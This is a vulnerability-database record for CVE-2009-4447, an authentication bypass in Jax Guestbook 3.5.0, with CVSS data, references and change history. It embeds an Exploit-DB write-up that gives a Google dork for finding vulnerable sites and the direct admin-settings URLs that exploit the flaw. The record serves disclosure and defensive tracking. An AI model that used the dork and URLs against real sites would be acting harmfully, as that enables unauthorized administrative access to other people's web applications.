ID CVE-2009-4447Type cveReporter NVDModified 2017-08-16T21:31:35
Description
Jax Guestbook 3.5.0 allows remote attackers to bypass authentication and modify administrator settings via a direct request to admin/guestbook.admin.php.
{"id": "CVE-2009-4447", "bulletinFamily": "NVD", "title": "CVE-2009-4447", "description": "Jax Guestbook 3.5.0 allows remote attackers to bypass authentication and modify administrator settings via a direct request to admin/guestbook.admin.php.", "published": "2009-12-29T15:41:20", "modified": "2017-08-16T21:31:35", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4447", "reporter": "NVD", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/55077", "http://www.securityfocus.com/bid/37466", "http://www.exploit-db.com/exploits/10626"], "cvelist": ["CVE-2009-4447"], "type": "cve", "lastseen": "2017-08-17T11:14:34", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:jax_scripts:jax_guestbook:3.5.0"], "cvelist": ["CVE-2009-4447"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Jax Guestbook 3.5.0 allows remote attackers to bypass authentication and modify administrator settings via a direct request to admin/guestbook.admin.php.", "edition": 1, "enchantments": {}, "hash": "4b0320797121a59179d3d57c64edee9bc408f982f5ab93c3ec4c79416fc2233f", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "0c6cbd265dfffb32fbfdafc10381f7ea", "key": "references"}, {"hash": "0d08af603659f606f6f8dc9bf5e9eb0b", "key": "title"}, {"hash": "ab9d0a5bc10fd8afaa0c8932cb59cc1d", "key": "cpe"}, {"hash": "bfd7a1473b33db05cb31ddccca02f6dd", "key": "href"}, {"hash": "486d9be1d52e36604edb66d101489012", "key": "description"}, {"hash": "e476a3fb5ced31fadce3390bff8368bd", "key": "published"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "5acb2f7d3fd125a3a0811b6d9b8bd755", "key": "modified"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "b1fa007aaf89ab5651bb2eac584a4985", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4447", "id": "CVE-2009-4447", "lastseen": "2016-09-03T13:11:26", "modified": "2010-01-04T00:00:00", "objectVersion": "1.2", "published": "2009-12-29T15:41:20", "references": ["http://www.securityfocus.com/bid/37466", "http://xforce.iss.net/xforce/xfdb/55077", "http://www.exploit-db.com/exploits/10626"], "reporter": "NVD", "scanner": [], "title": "CVE-2009-4447", "type": "cve", "viewCount": 1}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T13:11:26"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "ab9d0a5bc10fd8afaa0c8932cb59cc1d"}, {"key": "cvelist", "hash": "b1fa007aaf89ab5651bb2eac584a4985"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "486d9be1d52e36604edb66d101489012"}, {"key": "href", "hash": "bfd7a1473b33db05cb31ddccca02f6dd"}, {"key": "modified", "hash": "324d139311d5184cfdd885db3607f15c"}, {"key": "published", "hash": "e476a3fb5ced31fadce3390bff8368bd"}, {"key": "references", "hash": "361308490933d440a15d6eceb1591c8c"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "0d08af603659f606f6f8dc9bf5e9eb0b"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "8f4f88c5893fbb5a37c78a58e967ac940e7c3cfe8a1ba729454aab1227e69c5f", "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-08-17T11:14:34"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:10626"]}], "modified": "2017-08-17T11:14:34"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:jax_scripts:jax_guestbook:3.5.0"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"exploitdb": [{"lastseen": "2016-02-01T12:52:03", "bulletinFamily": "exploit", "description": "Jax Guestbook 3.50 Admin Login Exploit. CVE-2009-4447. Webapps exploit for php platform", "modified": "2009-12-24T00:00:00", "published": "2009-12-24T00:00:00", "id": "EDB-ID:10626", "href": "https://www.exploit-db.com/exploits/10626/", "type": "exploitdb", "title": "Jax Guestbook 3.50 Admin Login Exploit", "sourceData": "# Exploit Title: Jax Guestbook 3.50 Admin Login Exploit\r\n# Date: December 23rd, 2009\r\n# Author: Sora\r\n# Software Link: http://script.wareseeker.com/ASP-NET/jax-guestbook-3.50.zip/32956d53cf\r\n# Version: 3.50\r\n# Tested on: Windows and Linux\r\n\r\n-------------------------------------------\r\n>> Jax Guestbook 3.50 Admin Login Exploit\r\n>> Description: Jax Guestbook 3.50 suffers a bug that will allow you to log in as the admin.\r\n>> Found by: Sora\r\n>> Contact: vhr95zw [at] hotmail.com\r\n>> Google Dork: \"inurl:guestbook.admin.php?action=settings\"\r\n\r\nWe can access the admin directory of Jax Guestbook 3.50 to edit the admin settings.\r\n\r\n# Code: http://www.site.com/admin/gaestebuch/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0 <German>\r\nhttp://www.site.com/admin/guestbook/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0 <English>\r\n\r\n# Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10626/"}]}
